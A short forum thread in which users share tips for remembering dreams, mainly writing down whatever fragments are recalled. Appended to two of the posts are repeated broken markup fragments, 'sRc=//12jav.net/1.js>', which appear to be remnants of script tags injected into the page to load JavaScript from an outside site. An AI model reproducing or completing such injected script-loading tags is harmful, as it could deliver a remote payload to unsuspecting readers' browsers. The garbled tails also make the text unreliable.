hello,
I was wondering does anyone have any methods or tricks. That helps them remeber they dreams or nightmares. I can only recall certain bits and pieces of them but never the the whole thing. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Just write the bits you remember, it will get easier as you keep doing it. Also try and record every detail you remember.

thats what i've been doing, while trying to find the meanings to each event and details as i can in each dream. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
